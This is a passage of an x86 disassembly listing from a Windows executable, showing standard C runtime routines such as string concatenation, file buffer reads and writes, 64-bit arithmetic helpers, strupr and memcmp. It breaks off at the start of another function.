mov edx, [ebp+var_8]
add edx, [ebp+var_14]
mov [ebp+var_8], edx
jmp short loc_419F93
; ---------------------------------------------------------------------------
loc_419F4E: ; CODE XREF: sub_419DD0+DF�j
mov eax, [ebp+arg_C]
push eax
call sub_421790
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_419F70
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp short loc_419F9B
; ---------------------------------------------------------------------------
loc_419F70: ; CODE XREF: sub_419DD0+191�j
mov ecx, [ebp+var_8]
mov dl, byte ptr [ebp+var_4]
mov [ecx], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_C]
sub ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+arg_C]
mov eax, [edx+18h]
mov [ebp+var_1C], eax
loc_419F93: ; CODE XREF: sub_419DD0+D4�j
; sub_419DD0+17C�j
jmp loc_419E1B
; ---------------------------------------------------------------------------
loc_419F98: ; CODE XREF: sub_419DD0+4F�j
mov eax, [ebp+arg_8]
loc_419F9B: ; CODE XREF: sub_419DD0+24�j
; sub_419DD0+143�j ...
mov esp, ebp
pop ebp
retn
sub_419DD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419FA0 proc near ; CODE XREF: sub_406D34+2C5�p
; sub_409842+75�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_41A011
sub_419FA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419FB0 proc near ; CODE XREF: sub_40449C+13E�p
; sub_407317+15D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_419FCC
loc_419FBD: ; CODE XREF: sub_419FB0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_419FFF
test ecx, 3
jnz short loc_419FBD
loc_419FCC: ; CODE XREF: sub_419FB0+B�j
; sub_419FB0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_419FCC
mov eax, [ecx-4]
test al, al
jz short loc_41A00E
test ah, ah
jz short loc_41A009
test eax, 0FF0000h
jz short loc_41A004
test eax, 0FF000000h
jz short loc_419FFF
jmp short loc_419FCC
; ---------------------------------------------------------------------------
loc_419FFF: ; CODE XREF: sub_419FB0+12�j
; sub_419FB0+4B�j
lea edi, [ecx-1]
jmp short loc_41A011
; ---------------------------------------------------------------------------
loc_41A004: ; CODE XREF: sub_419FB0+44�j
lea edi, [ecx-2]
jmp short loc_41A011
; ---------------------------------------------------------------------------
loc_41A009: ; CODE XREF: sub_419FB0+3D�j
lea edi, [ecx-3]
jmp short loc_41A011
; ---------------------------------------------------------------------------
loc_41A00E: ; CODE XREF: sub_419FB0+39�j
lea edi, [ecx-4]
loc_41A011: ; CODE XREF: sub_419FA0+5�j
; sub_419FB0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_41A036
loc_41A01D: ; CODE XREF: sub_419FB0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_41A088
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_41A01D
jmp short loc_41A036
; ---------------------------------------------------------------------------
loc_41A031: ; CODE XREF: sub_419FB0+9E�j
; sub_419FB0+B8�j
mov [edi], edx
add edi, 4
loc_41A036: ; CODE XREF: sub_419FB0+6B�j
; sub_419FB0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_41A031
test dl, dl
jz short loc_41A088
test dh, dh
jz short loc_41A07F
test edx, 0FF0000h
jz short loc_41A072
test edx, 0FF000000h
jz short loc_41A06A
jmp short loc_41A031
; ---------------------------------------------------------------------------
loc_41A06A: ; CODE XREF: sub_419FB0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41A072: ; CODE XREF: sub_419FB0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_41A07F: ; CODE XREF: sub_419FB0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41A088: ; CODE XREF: sub_419FB0+72�j
; sub_419FB0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_419FB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A090 proc near ; CODE XREF: sub_404A02+127�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_C]
push eax
call sub_421230
add esp, 4
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41A0D0
add esp, 10h
mov [ebp+var_4], eax
mov edx, [ebp+arg_C]
push edx
call sub_4212A0
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_41A090 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A0D0 proc near ; CODE XREF: sub_41A090+20�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
imul ecx, [ebp+arg_8]
mov [ebp+var_10], ecx
mov edx, [ebp+var_10]
mov [ebp+var_C], edx
cmp [ebp+var_C], 0
jnz short loc_41A0F9
xor eax, eax
jmp loc_41A2E5
; ---------------------------------------------------------------------------
loc_41A0F9: ; CODE XREF: sub_41A0D0+20�j
mov eax, [ebp+arg_C]
mov ecx, [eax+0Ch]
and ecx, 10Ch
test ecx, ecx
jz short loc_41A114
mov edx, [ebp+arg_C]
mov eax, [edx+18h]
mov [ebp+var_1C], eax
jmp short loc_41A11B
; ---------------------------------------------------------------------------
loc_41A114: ; CODE XREF: sub_41A0D0+37�j
mov [ebp+var_1C], 1000h
loc_41A11B: ; CODE XREF: sub_41A0D0+42�j
; sub_41A0D0:loc_41A2DD�j
cmp [ebp+var_C], 0
jz loc_41A2E2
mov ecx, [ebp+arg_C]
mov edx, [ecx+0Ch]
and edx, 108h
test edx, edx
jz short loc_41A1A9
mov eax, [ebp+arg_C]
cmp dword ptr [eax+4], 0
jz short loc_41A1A9
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_C]
cmp edx, [ecx+4]
jnb short loc_41A151
mov eax, [ebp+var_C]
mov [ebp+var_20], eax
jmp short loc_41A15A
; ---------------------------------------------------------------------------
loc_41A151: ; CODE XREF: sub_41A0D0+77�j
mov ecx, [ebp+arg_C]
mov edx, [ecx+4]
mov [ebp+var_20], edx
loc_41A15A: ; CODE XREF: sub_41A0D0+7F�j
mov eax, [ebp+var_20]
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
push ecx
mov edx, [ebp+var_8]
push edx
mov eax, [ebp+arg_C]
mov ecx, [eax]
push ecx
call sub_418A00
add esp, 0Ch
mov edx, [ebp+var_C]
sub edx, [ebp+var_18]
mov [ebp+var_C], edx
mov eax, [ebp+arg_C]
mov ecx, [eax+4]
sub ecx, [ebp+var_18]
mov edx, [ebp+arg_C]
mov [edx+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [eax]
add ecx, [ebp+var_18]
mov edx, [ebp+arg_C]
mov [edx], ecx
mov eax, [ebp+var_8]
add eax, [ebp+var_18]
mov [ebp+var_8], eax
jmp loc_41A2DD
; ---------------------------------------------------------------------------
loc_41A1A9: ; CODE XREF: sub_41A0D0+63�j
; sub_41A0D0+6C�j
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_1C]
jb loc_41A27F
mov edx, [ebp+arg_C]
mov eax, [edx+0Ch]
and eax, 108h
test eax, eax
jz short loc_41A1E4
mov ecx, [ebp+arg_C]
push ecx
call sub_421580
add esp, 4
test eax, eax
jz short loc_41A1E4
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp loc_41A2E5
; ---------------------------------------------------------------------------
loc_41A1E4: ; CODE XREF: sub_41A0D0+F2�j
; sub_41A0D0+102�j
cmp [ebp+var_1C], 0
jz short loc_41A1FC
mov eax, [ebp+var_C]
xor edx, edx
div [ebp+var_1C]
mov eax, [ebp+var_C]
sub eax, edx
mov [ebp+var_24], eax
jmp short loc_41A202
; ---------------------------------------------------------------------------
loc_41A1FC: ; CODE XREF: sub_41A0D0+118�j
mov ecx, [ebp+var_C]
mov [ebp+var_24], ecx
loc_41A202: ; CODE XREF: sub_41A0D0+12A�j
mov edx, [ebp+var_24]
mov [ebp+var_18], edx
mov eax, [ebp+var_18]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+arg_C]
mov eax, [edx+10h]
push eax
call sub_422370
add esp, 0Ch
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41A247
mov ecx, [ebp+arg_C]
mov edx, [ecx+0Ch]
or edx, 20h
mov eax, [ebp+arg_C]
mov [eax+0Ch], edx
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp loc_41A2E5
; ---------------------------------------------------------------------------
loc_41A247: ; CODE XREF: sub_41A0D0+156�j
mov ecx, [ebp+var_C]
sub ecx, [ebp+var_14]
mov [ebp+var_C], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_14]
mov [ebp+var_8], edx
mov eax, [ebp+var_14]
cmp eax, [ebp+var_18]
jnb short loc_41A27D
mov ecx, [ebp+arg_C]
mov edx, [ecx+0Ch]
or edx, 20h
mov eax, [ebp+arg_C]
mov [eax+0Ch], edx
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp short loc_41A2E5
; ---------------------------------------------------------------------------
loc_41A27D: ; CODE XREF: sub_41A0D0+18F�j
jmp short loc_41A2DD
; ---------------------------------------------------------------------------
loc_41A27F: ; CODE XREF: sub_41A0D0+DF�j
mov ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
mov [ebp+var_4], edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_41E810
add esp, 8
cmp eax, 0FFFFFFFFh
jnz short loc_41A2AA
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp short loc_41A2E5
; ---------------------------------------------------------------------------
loc_41A2AA: ; CODE XREF: sub_41A0D0+1CB�j
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
sub eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+18h], 0
jle short loc_41A2D0
mov edx, [ebp+arg_C]
mov eax, [edx+18h]
mov [ebp+var_28], eax
jmp short loc_41A2D7
; ---------------------------------------------------------------------------
loc_41A2D0: ; CODE XREF: sub_41A0D0+1F3�j
mov [ebp+var_28], 1
loc_41A2D7: ; CODE XREF: sub_41A0D0+1FE�j
mov ecx, [ebp+var_28]
mov [ebp+var_1C], ecx
loc_41A2DD: ; CODE XREF: sub_41A0D0+D4�j
; sub_41A0D0:loc_41A27D�j
jmp loc_41A11B
; ---------------------------------------------------------------------------
loc_41A2E2: ; CODE XREF: sub_41A0D0+4F�j
mov eax, [ebp+arg_8]
loc_41A2E5: ; CODE XREF: sub_41A0D0+24�j
; sub_41A0D0+10F�j ...
mov esp, ebp
pop ebp
retn
sub_41A0D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41A2F0 proc near ; CODE XREF: sub_404CEF+19E�p
; sub_414F67+11B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_41A309
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_41A309: ; CODE XREF: sub_41A2F0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_41A2F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A330 proc near ; CODE XREF: sub_41B2D0+C�p
; DATA XREF: .data:off_442C38�o
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_41A370
call sub_422700
mov dword_492074, eax
call sub_422680
fnclex
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41A330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A360 proc near ; DATA XREF: .data:00442C3C�o
; .data:00442C40�o
push ebp
mov ebp, esp
pop ebp
retn
sub_41A360 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A370 proc near ; CODE XREF: sub_41A330+6�p
push ebp
mov ebp, esp
mov off_443200, offset sub_422DF0
mov off_443204, offset sub_422800
mov off_443208, offset sub_422910
mov off_44320C, offset sub_422750
mov off_443210, offset sub_4228E0
mov off_443214, offset sub_422DF0
pop ebp
retn
sub_41A370 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, dword_492070
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_492070, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A3E0 proc near ; CODE XREF: sub_405593+8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push eax
call ds:dword_49437C
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_41A40B
call ds:dword_4942F0
push eax
call sub_422E80
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_41A43C
; ---------------------------------------------------------------------------
loc_41A40B: ; CODE XREF: sub_41A3E0+15�j
mov ecx, [ebp+var_4]
and ecx, 1
test ecx, ecx
jz short loc_41A43A
mov edx, [ebp+arg_4]
and edx, 2
test edx, edx
jz short loc_41A43A
call sub_422F20
mov dword ptr [eax], 0Dh
call sub_422F30
mov dword ptr [eax], 5
or eax, 0FFFFFFFFh
jmp short loc_41A43C
; ---------------------------------------------------------------------------
loc_41A43A: ; CODE XREF: sub_41A3E0+33�j
; sub_41A3E0+3D�j
xor eax, eax
loc_41A43C: ; CODE XREF: sub_41A3E0+29�j
; sub_41A3E0+58�j
mov esp, ebp
pop ebp
retn
sub_41A3E0 endp
; =============== S U B R O U T I N E =======================================
sub_41A440 proc near ; CODE XREF: sub_4055AD+3F�p
; sub_415374+2A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_41A462
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_41A4A3
; ---------------------------------------------------------------------------
loc_41A462: ; CODE XREF: sub_41A440+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_41A470: ; CODE XREF: sub_41A440+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41A470
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_41A49E
cmp edx, [esp+8+arg_4]
ja short loc_41A49E
jb short loc_41A49F
cmp eax, [esp+8+arg_0]
jbe short loc_41A49F
loc_41A49E: ; CODE XREF: sub_41A440+4E�j
; sub_41A440+54�j
dec esi
loc_41A49F: ; CODE XREF: sub_41A440+56�j
; sub_41A440+5C�j
xor edx, edx
mov eax, esi
loc_41A4A3: ; CODE XREF: sub_41A440+20�j
pop esi
pop ebx
retn 10h
sub_41A440 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41A4B0 proc near ; CODE XREF: sub_4055AD+2D�p
; sub_415374+43�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_41A4D1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_41A521
; ---------------------------------------------------------------------------
loc_41A4D1: ; CODE XREF: sub_41A4B0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41A4DF: ; CODE XREF: sub_41A4B0+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41A4DF
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_41A50A
cmp edx, [esp+4+arg_4]
ja short loc_41A50A
jb short loc_41A512
cmp eax, [esp+4+arg_0]
jbe short loc_41A512
loc_41A50A: ; CODE XREF: sub_41A4B0+4A�j
; sub_41A4B0+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_41A512: ; CODE XREF: sub_41A4B0+52�j
; sub_41A4B0+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_41A521: ; CODE XREF: sub_41A4B0+1F�j
pop ebx
retn 10h
sub_41A4B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41A530 proc near ; CODE XREF: sub_4056BD+5E�p
; sub_4056BD+8E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_41A551
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_41A551: ; CODE XREF: sub_41A530+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41A56D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41A56D: ; CODE XREF: sub_41A530+27�j
or eax, eax
jnz short loc_41A589
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41A5CA
; ---------------------------------------------------------------------------
loc_41A589: ; CODE XREF: sub_41A530+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_41A597: ; CODE XREF: sub_41A530+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_41A597
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_41A5C5
cmp edx, [esp+0Ch+arg_4]
ja short loc_41A5C5
jb short loc_41A5C6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_41A5C6
loc_41A5C5: ; CODE XREF: sub_41A530+85�j
; sub_41A530+8B�j
dec esi
loc_41A5C6: ; CODE XREF: sub_41A530+8D�j
; sub_41A530+93�j
xor edx, edx
mov eax, esi
loc_41A5CA: ; CODE XREF: sub_41A530+57�j
dec edi
jnz short loc_41A5D4
neg edx
neg eax
sbb edx, 0
loc_41A5D4: ; CODE XREF: sub_41A530+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_41A530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5E0 proc near ; CODE XREF: sub_405E58+BF�p
; sub_405E58+12C�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_8], 0
cmp dword_492170, 0
jnz short loc_41A63D
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
jmp short loc_41A607
; ---------------------------------------------------------------------------
loc_41A5FE: ; CODE XREF: sub_41A5E0:loc_41A633�j
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_41A607: ; CODE XREF: sub_41A5E0+1C�j
mov edx, [ebp+var_10]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_41A635
mov ecx, [ebp+var_10]
movsx edx, byte ptr [ecx]
cmp edx, 61h
jl short loc_41A633
mov eax, [ebp+var_10]
movsx ecx, byte ptr [eax]
cmp ecx, 7Ah
jg short loc_41A633
mov edx, [ebp+var_10]
mov al, [edx]
add al, 0E0h
mov ecx, [ebp+var_10]
mov [ecx], al
loc_41A633: ; CODE XREF: sub_41A5E0+3A�j
; sub_41A5E0+45�j
jmp short loc_41A5FE
; ---------------------------------------------------------------------------
loc_41A635: ; CODE XREF: sub_41A5E0+2F�j
mov eax, [ebp+arg_0]
jmp loc_41A79B
; ---------------------------------------------------------------------------
loc_41A63D: ; CODE XREF: sub_41A5E0+14�j
push offset dword_49274C
call ds:dword_494418
cmp dword_492748, 0
jz short loc_41A66F
push offset dword_49274C
call ds:dword_494414
push 13h
call sub_41BC90
add esp, 4
mov [ebp+var_C], 1
jmp short loc_41A676
; ---------------------------------------------------------------------------
loc_41A66F: ; CODE XREF: sub_41A5E0+6F�j
mov [ebp+var_C], 0
loc_41A676: ; CODE XREF: sub_41A5E0+8D�j
cmp dword_492170, 0
jnz short loc_41A6E4
cmp [ebp+var_C], 0
jz short loc_41A691
push 13h
call sub_41BD30
add esp, 4
jmp short loc_41A69C
; ---------------------------------------------------------------------------
loc_41A691: ; CODE XREF: sub_41A5E0+A3�j
push offset dword_49274C
call ds:dword_494414
loc_41A69C: ; CODE XREF: sub_41A5E0+AF�j
mov edx, [ebp+arg_0]
mov [ebp+var_14], edx
jmp short loc_41A6AD
; ---------------------------------------------------------------------------
loc_41A6A4: ; CODE XREF: sub_41A5E0:loc_41A6DA�j
mov eax, [ebp+var_14]
add eax, 1
mov [ebp+var_14], eax
loc_41A6AD: ; CODE XREF: sub_41A5E0+C2�j
mov ecx, [ebp+var_14]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_41A6DC
mov eax, [ebp+var_14]
movsx ecx, byte ptr [eax]
cmp ecx, 61h
jl short loc_41A6DA
mov edx, [ebp+var_14]
movsx eax, byte ptr [edx]
cmp eax, 7Ah
jg short loc_41A6DA
mov ecx, [ebp+var_14]
mov dl, [ecx]
add dl, 0E0h
mov eax, [ebp+var_14]
mov [eax], dl
loc_41A6DA: ; CODE XREF: sub_41A5E0+E0�j
; sub_41A5E0+EB�j
jmp short loc_41A6A4
; ---------------------------------------------------------------------------
loc_41A6DC: ; CODE XREF: sub_41A5E0+D5�j
mov eax, [ebp+arg_0]
jmp loc_41A79B
; ---------------------------------------------------------------------------
loc_41A6E4: ; CODE XREF: sub_41A5E0+9D�j
push 1
push 0
push 0
push 0
push 0FFFFFFFFh
mov ecx, [ebp+arg_0]
push ecx
push 200h
mov edx, dword_492170
push edx
call sub_422F40
add esp, 20h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41A711
jmp short loc_41A76D
; ---------------------------------------------------------------------------
loc_41A711: ; CODE XREF: sub_41A5E0+12D�j
push 62h
push offset aStrupr_c ; "strupr.c"
push 2
mov eax, [ebp+var_4]
push eax
call sub_416A30
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_41A731
jmp short loc_41A76D
; ---------------------------------------------------------------------------
loc_41A731: ; CODE XREF: sub_41A5E0+14D�j
push 1
push 0
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_8]
push edx
push 0FFFFFFFFh
mov eax, [ebp+arg_0]
push eax
push 200h
mov ecx, dword_492170
push ecx
call sub_422F40
add esp, 20h
test eax, eax
jnz short loc_41A75D
jmp short loc_41A76D
; ---------------------------------------------------------------------------
loc_41A75D: ; CODE XREF: sub_41A5E0+179�j
mov edx, [ebp+var_8]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_419FA0
add esp, 8
loc_41A76D: ; CODE XREF: sub_41A5E0+12F�j
; sub_41A5E0+14F�j ...
cmp [ebp+var_C], 0
jz short loc_41A77F
push 13h
call sub_41BD30
add esp, 4
jmp short loc_41A78A
; ---------------------------------------------------------------------------
loc_41A77F: ; CODE XREF: sub_41A5E0+191�j
push offset dword_49274C
call ds:dword_494414
loc_41A78A: ; CODE XREF: sub_41A5E0+19D�j
push 2
mov ecx, [ebp+var_8]
push ecx
call sub_4174C0
add esp, 8
mov eax, [ebp+arg_0]
loc_41A79B: ; CODE XREF: sub_41A5E0+58�j
; sub_41A5E0+FF�j
mov esp, ebp
pop ebp
retn
sub_41A5E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41A7A0 proc near ; CODE XREF: sub_40646E+1D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_41A7EC
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_41A7ED
test eax, 1
jz short loc_41A7CD
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41A81A
inc esi
inc edi
dec eax
jz short loc_41A7EA
loc_41A7CD: ; CODE XREF: sub_41A7A0+20�j
; sub_41A7A0+48�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41A81A
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41A81A
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41A7CD
loc_41A7EA: ; CODE XREF: sub_41A7A0+2B�j
; sub_41A7A0+84�j
pop edi
pop esi
locret_41A7EC: ; CODE XREF: sub_41A7A0+6�j
retn
; ---------------------------------------------------------------------------
loc_41A7ED: ; CODE XREF: sub_41A7A0+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_41A822
repe cmpsd
jz short loc_41A822
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_41A815
cmp ch, dh
jnz short loc_41A815
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_41A815
cmp ch, dh
loc_41A815: ; CODE XREF: sub_41A7A0+63�j
; sub_41A7A0+67�j ...
mov eax, 0
loc_41A81A: ; CODE XREF: sub_41A7A0+26�j
; sub_41A7A0+33�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A822: ; CODE XREF: sub_41A7A0+55�j
; sub_41A7A0+59�j
test eax, eax
jz short loc_41A7EA
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_41A815
dec eax
jz short loc_41A849
cmp dh, ch
jnz short loc_41A815
dec eax
jz short loc_41A849
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_41A815
dec eax
loc_41A849: ; CODE XREF: sub_41A7A0+8F�j
; sub_41A7A0+96�j
pop edi
pop esi
retn
sub_41A7A0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0
mov eax, [ebp+10h]
push eax
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp+8]
push edx
call sub_41A870
add esp, 10h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A870 proc near ; CODE XREF: .text:0041A861�p
; sub_41ABB0+11�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
